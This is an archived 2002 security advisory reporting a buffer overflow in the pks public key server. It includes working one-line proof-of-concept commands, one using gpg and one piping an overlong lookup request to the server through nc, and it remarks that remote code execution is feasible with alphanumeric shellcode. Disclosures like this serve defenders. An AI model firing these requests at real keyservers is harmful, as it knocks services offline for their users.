TUCoPS :: Unix :: General :: unix5378.htm


TUCoPS :: Unix :: General :: unix5378.htm

pks buffer overflow
30th May 2002 [SBWID-5378]
COMMAND
	pks buffer overflow
SYSTEMS AFFECTED
	current version
PROBLEM
	Max [rusmir@tula.net] posted following:
	
	A popular pks public key server available from
	http://www.mit.edu/people/marc/pks/pks.html is vulnerable to buffer
	overflow attack.
	
	A long enough (> 256b) search request will crash the service.
	
	It is as simple as this:
	
	
	gpg --search-keys `perl -e \"print \'A\'x512\"`
	
	
	or, without gpg,
	
	
	echo -e \"GET /pks/lookup?op=index&search=`perl -e \"print \'A\'x512\"`\"| nc keyserver-host 11371
	
	
	Fortunately (or unfortunately) in order to exploit remote execution,
	the code should be isalnum() string and should be able to survive
	tolower() conversion. But it is possible to write, especially for
	systems with locales, where 0x80..0xff are printable characters.
SOLUTION
	Nothing yet.

AltStyle によって変換されたページ (->オリジナル) /

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH